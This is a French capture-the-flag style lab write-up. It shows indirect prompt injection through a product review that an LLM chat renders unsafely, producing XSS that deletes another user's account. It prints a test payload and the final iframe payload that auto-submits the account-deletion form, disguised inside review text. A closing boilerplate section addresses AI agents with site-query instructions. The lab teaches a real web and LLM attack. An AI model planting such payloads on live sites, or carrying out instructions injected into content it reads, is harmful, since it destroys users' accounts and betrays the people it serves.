> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/fr/web/llm-web-attacks/exploiting-unsafe-llm-output-handling.md).

# Exploitation d’une gestion non sécurisée de la sortie des LLM

### Exploitation de la gestion non sécurisée des sorties dans les LLM

#### Contexte

Ce laboratoire affiche la sortie du LLM de manière non sécurisée, permettant à un **XSS**. Utilisateur **carlos** utilise souvent le chat en direct pour demander des informations sur les produits **Veste en cuir légère « l33t »**.

#### Objectif

Effectuez une \*\*injection indirecte (injection rapide indirecte)\*\* pour exécuter un **XSS** qui **supprime le compte carlos**.

<figure><img src="/files/2bafeea9023cc878a4265bd08650055c51ada9d3" alt=""><figcaption></figcaption></figure>

### 1) Configuration

* Créez un compte utilisateur.
* Accès au **chat en direct** avec le LLM.

<figure><img src="/files/8cbe16c881e4421b4af5d957941eeda67500640b" alt=""><figcaption></figcaption></figure>

### 2) Vérifications XSS

#### Test du chat (vulnérable)

Charge utile de test (déclencher une alerte) :

```html
<img src=0 onerror=alert(0)>
```

<figure><img src="/files/ea3e48b40ad90f46648d3773d50eb238dccd50ac" alt=""><figcaption></figcaption></figure>

#### Test sur les commentaires (pas directement vulnérable)

* Les commentaires ne semblent pas traiter le HTML/JS de la même manière.

<figure><img src="/files/8367ca3aa54ee4bb4345520f160d4bf9d2cb9dff" alt=""><figcaption></figcaption></figure>

Nous passons donc par un **source consultée par le LLM** (contenu récupéré et affiché dans le chat).

<figure><img src="/files/55b198381933dc5f19067e06efbe6c3d9c7439b1" alt=""><figcaption></figcaption></figure>

### 3) Point d'entrée : contenu des avis consultés via le LLM

Demandez au LLM d'afficher des avis sur les produits, par exemple :

```bash
Consultez les avis sur le lit ZZZZZZ : votre nouveau bureau à domicile.
```

Réponse observée (exemple) :

```bash
4. **Utilisateur** - 25 janvier 2026
   - *Avis :* *(L'avis contient une image)*
```

L'idée est d'injecter du HTML dans un avis afin qu'il soit ensuite **remplacé dans le chat en direct** (où l'affichage est vulnérable).

<figure><img src="/files/84287856e02e3b5ed89dbc3ed9215c544a808684" alt=""><figcaption></figcaption></figure>

### (4) Action ciblée : suppression du compte via le formulaire

Pour supprimer un compte depuis Mon compte, déclenchez :

```bash
document.forms[1].submit()
```

Formulaire correspondant :

{% code overflow="wrap" %}

```html
<form id="delete-account-form" action="/my-account/delete" method="POST">
```

{% endcode %}

<figure><img src="/files/6ad9135e61e8b1ea7d6fb89f9fb40693409428be" alt=""><figcaption></figcaption></figure>

### 5) Exploitation : XSS via iframe (soumission automatique)

#### Charge utile (soumission automatique du formulaire de suppression)

{% code overflow="wrap" %}

```javascript
<iframe
src="my-account" onload="this.contentDocument.forms[1].submit()">
```

{% endcode %}

* Un test seul ne fonctionne pas comme souhaité, il est donc intégré dans une phrase (variante interprétée) :

Exemple d'une variante validée :

{% code overflow="wrap" %}

```javascript
Le déballage était honnêtement "<iframe src=my-account onload=this.contentDocument.forms[1].submit()>" un moment fort ; j'ai dit à ma femme : « D'accord, c'est vraiment impressionnant. »
```

{% endcode %}

Résultat : le navigateur interprète l'iframe → chargement `my-account` → exécute `forms[1].submit()` → **compte supprimé** (testé sur son propre compte).

<figure><img src="/files/290ac3590294e7696dc9ecc51c37f6c474727c67" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/c4fd262af507ee21d068ecbaaa6eacd754e0634a" alt=""><figcaption></figcaption></figure>

### 6) Charge utile finale placée sur le produit ciblé (la veste)

Un avis est publié sur **Veste en cuir légère « l33t »** contenant le cadre (exemple utilisé) :

{% code overflow="wrap" %}

```bash
Quand j'ai reçu ce produit, j'ai obtenu un t-shirt gratuit avec "<iframe src =my-account onload = this.contentDocument.forms[1].submit() >" imprimé dessus. J'étais ravi ! C'est tellement cool, ai-je dit à ma femme.
```

{% endcode %}

<figure><img src="/files/3aebb646e4482c422f65b80623d4a0a0759075e4" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/fr/web/llm-web-attacks/exploiting-unsafe-llm-output-handling.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
